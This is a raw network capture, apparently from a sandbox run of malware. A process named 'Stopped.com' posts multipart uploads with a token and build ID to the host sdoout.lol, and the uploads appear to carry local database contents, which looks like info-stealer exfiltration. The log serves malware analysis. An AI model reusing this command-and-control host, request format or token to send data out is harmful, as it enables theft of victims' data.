2024-12-31 15:57:52 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-31 15:57:52 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-31 15:57:52 UTC	16355	OUT	Data Raw: 76 62 6e 52 68 59 33 52 66 61 57 35 6d 62 79 41 6f 5a 33 56 70 5a 43 42 57 51 56 4a 44 53 45 46 53 49 46 42 53 53 55 31 42 55 6c 6b 67 53 30 56 5a 4c 43 42 31 63 32 56 66 59 32 39 31 62 6e 51 67 53 55 35 55 52 55 64 46 55 69 42 4f 54 31 51 67 54 6c 56 4d 54 43 42 45 52 55 5a 42 56 55 78 55 49 44 41 73 49 48 56 7a 5a 56 39 6b 59 58 52 6c 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 6b 59 58 52 6c 58 32 31 76 5a 47 6c 6d 61 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 73 59 57 35 6e 64 57 46 6e 5a 56 39 6a 62 32 52 6c 49 46 5a 42 55 6b 4e 49 51 56 49 73 49 47 78 68 59 6d 56 73 49 46 5a 42 55 6b 4e 49 51 56 Data Ascii: vbnRhY3RfaW5mbyAoZ3VpZCBWQVJDSEFSIFBSSU1BUlkgS0VZLCB1c2VfY291bnQgSU5URUdFUiBOT1QgTlVMTCBERUZBVUxUIDAsIHVzZV9kYXRlIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBkYXRlX21vZGlmaWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBsYW5ndWFnZV9jb2RlIFZBUkNIQVIsIGxhYmVsIFZBUkNIQV
2024-12-31 15:57:52 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-31 15:57:52 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-31 15:57:52 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-31 15:57:52 UTC	11617	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-31 15:57:53 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 31 Dec 2024 15:57:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-31 15:57:53 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	51515	116.203.14.4	443	7964	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com

Timestamp	Bytes transferred	Direction	Data
2024-12-31 15:57:53 UTC	275	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----16xlfu3wl6pzu3wbsjeu User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0 Host: sdoout.lol Content-Length: 493 Connection: Keep-Alive Cache-Control: no-cache
2024-12-31 15:57:53 UTC	493	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 31 36 78 6c 66 75 33 77 6c 36 70 7a 75 33 77 62 73 6a 65 75 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 62 32 35 61 35 32 37 32 39 66 33 35 63 63 38 32 35 65 38 65 33 64 35 32 39 35 31 36 33 65 35 0d 0a 2d 2d 2d 2d 2d 2d 31 36 78 6c 66 75 33 77 6c 36 70 7a 75 33 77 62 73 6a 65 75 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 34 63 39 61 63 33 30 63 37 65 38 36 30 31 31 64 39 39 36 62 39 62 36 30 37 36 33 30 37 62 35 0d 0a 2d 2d 2d 2d 2d 2d 31 36 78 6c 66 75 33 77 6c 36 70 7a 75 33 77 62 73 6a 65 75 0d 0a 43 6f 6e 74 Data Ascii: ------16xlfu3wl6pzu3wbsjeuContent-Disposition: form-data; name="token"0b25a52729f35cc825e8e3d5295163e5------16xlfu3wl6pzu3wbsjeuContent-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------16xlfu3wl6pzu3wbsjeuCont
2024-12-31 15:57:54 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 31 Dec 2024 15:57:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-31 15:57:54 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	51516	116.203.14.4	443	7964	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com

Timestamp	Bytes transferred	Direction	Data
2024-12-31 15:57:54 UTC	278	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----c2no8yc2d268qq90z5xl User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0 Host: sdoout.lol Content-Length: 169765 Connection: Keep-Alive Cache-Control: no-cache
2024-12-31 15:57:54 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 63 32 6e 6f 38 79 63 32 64 32 36 38 71 71 39 30 7a 35 78 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 62 32 35 61 35 32 37 32 39 66 33 35 63 63 38 32 35 65 38 65 33 64 35 32 39 35 31 36 33 65 35 0d 0a 2d 2d 2d 2d 2d 2d 63 32 6e 6f 38 79 63 32 64 32 36 38 71 71 39 30 7a 35 78 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 34 63 39 61 63 33 30 63 37 65 38 36 30 31 31 64 39 39 36 62 39 62 36 30 37 36 33 30 37 62 35 0d 0a 2d 2d 2d 2d 2d 2d 63 32 6e 6f 38 79 63 32 64 32 36 38 71 71 39 30 7a 35 78 6c 0d 0a 43 6f 6e 74 Data Ascii: ------c2no8yc2d268qq90z5xlContent-Disposition: form-data; name="token"0b25a52729f35cc825e8e3d5295163e5------c2no8yc2d268qq90z5xlContent-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------c2no8yc2d268qq90z5xlCont
2024-12-31 15:57:54 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-31 15:57:54 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-31 15:57:54 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-31 15:57:54 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-31 15:57:54 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-31 15:57:54 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-31 15:57:54 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-31 15:57:54 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
